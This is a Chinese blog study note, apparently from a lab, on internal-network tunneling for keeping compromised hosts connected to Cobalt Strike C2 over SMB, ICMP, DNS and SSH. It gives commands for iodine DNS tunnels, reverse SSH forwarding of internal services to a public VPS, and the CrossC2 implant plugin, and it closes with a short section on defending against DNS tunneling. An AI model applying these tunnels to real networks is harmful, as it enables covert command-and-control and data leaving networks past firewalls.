当前位置:   article > 正文

【内网安全】隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac_cna插件

cna插件


CS不支持linux主机上线

在这里插入图片描述
这里禁用了所有tcp端口,依旧可以ping通,以及dns解析成功

SMB隧道&通讯&上线

判断:445通讯
通过端口扫描是否开放445端口进行判断
上线:借助通讯后绑定上线 详见往期文章
通讯:直接SMB协议通讯即可

ICMP隧道&通讯&上线

判断:ping命令
能ping通说明可以使用icmp隧道
上线:见往期文章

通讯:其他项目(icmpsh icmptunnel)
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

DNS隧道&通讯&上线

在这里插入图片描述
判断:windows:nslookup linux:dig

1、上线环境:内网主机只出网DNS协议数据,解决上线

-域名申请及配置
在这里插入图片描述
-监听器创建及配置
在这里插入图片描述
-后门绑定监听器及生成

CS建立DNS隧道上线

mode dns-txt
sleep 0

2、通讯环境:

有些鸡肋
内网主机只出网DNS协议数据,解决通讯
判断出网:nslookup www.baidu.com

项目工具:https://github.com/yarrick/iodine
iodine/ˈaɪədaɪn/单词的意思就是碘 原子序数为 53,53 也是 DNS 服务对应的端口号

安装

yum install iodine   #centos
apt-get intall iodine #ubuntu
  • 1
  • 2

-服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向 这里演示linux服务端,windows服务端下载地址 https://code.kryo.se/iodine/

iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD
  • 1

sudo iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD
-f 在前台运行
-c 不检查传入请求的客户端 IP 地址
-P 客户端与服务端之间的连接密码
-D 调试级别,-D 表示第一级,-DD 表示第二级,依此类推
192.168.0.1 是自己自定义的局域网虚拟 IP 地址。

设置密码whgojp并创建虚拟IP及绑定域名指向
在这里插入图片描述
-客户端:连接密码whgojp并绑定域名指向

windows 演示

iodine -f -M 200 -P whgojp ns1.whgojp.top
  • 1

在这里插入图片描述
直接放到靶机上执行会报错,windows客户端可以直接使用编译好的windows版本,同时需要安装TAP网卡驱动程序。也可以下载OpenVPN,安装时只选择TAP Virtual Ethernet Adapter,安装后服务器上就会多出一块“TAP-Wndows ADApter V9”的网卡
在这里插入图片描述
都能在对方电脑上安装程序了,还要这样大费周折

双方都新增了一个网卡(dns、TAP-9),从而建立了通道
ping不通是因为靶机上有防火墙

windows平台iodine建立DNS隧道连接

linux演示

未开防火墙
在这里插入图片描述

在这里插入图片描述

-尝试通讯尝试连接:
ssh kali@192.168.0.2
这里我尝试ssh连接,但是立即命令中断,可能是DNS配置问题
在这里插入图片描述

SSH隧道&通讯


判断:ssh连接
1、上线:
由于CS无SSH协议监听器配置,无法上线
2、通讯:
由于SSH协议存在于Linux系统,跳板机必须Linux

iptables -F /* 清除所有规则 /
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /允许包从22端口进入/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /允许从22端口进入的包返回/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /
域名解析端口,一般不开 /
iptables -A INPUT -p udp --sport 53 -j ACCEPT /
域名解析端口,一般不开 /
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /允许本机访问本机/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /允许所有IP访问80端口/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /保存配置/
iptables -L /
显示iptables列表 */

开启ssh协议登录:

vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
  • 1
  • 2
  • 3
  • 4
  • 5

本地:入站封
将本地访问 10.10.10.132的流量转发至公网vps 1234端口上

ssh -CfNg -R 1122:10.10.10.132:8080 root@47.94.130.xx
curl http://127.0.0.1:1122
  • 1
  • 2

SSH隧道流量转发远程vps-信息探针

远程:出站封
将本地访问10.10.10.132的流量转发至本地的1234的端口上

ssh -CfNg -L 1234:10.10.10.132:8080 root@10.10.10.146
curl http://127.0.0.1:1234
  • 1
  • 2

同上输入146密码,访问本地(146)1234端口,
在这里插入图片描述

防御DNS隧道攻击的方法

禁止网络中任何人向外部服务器发送DNS请求,只允许与受信任的DNS服务器通信。
虽然没有人会将TXT解析请求发送给DNS服务器,但是邮件服务器/网关会这样做,因此,可以将邮件服务器/网关列入白名单并阻止传入和传出流量中的TXT请求。
跟踪用户的DNS查询次数,如果达到阈值,就生成相应的报告

控制上线-插件-Linux&Mac&IOS&Android

项目:https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
1、插件使用
2、命令使用
使用参考:
https://gloxec.github.io/CrossC2/zh_cn/
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成

使用CS4.7版本没有搭建成功

待续
在这里插入图片描述

安卓apk木马可以使用msf生成,不过只能在模拟器中成功上线

参考:

https://zhuanlan.zhihu.com/p/379021936
https://www.cnblogs.com/micr067/p/12263337.html

本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号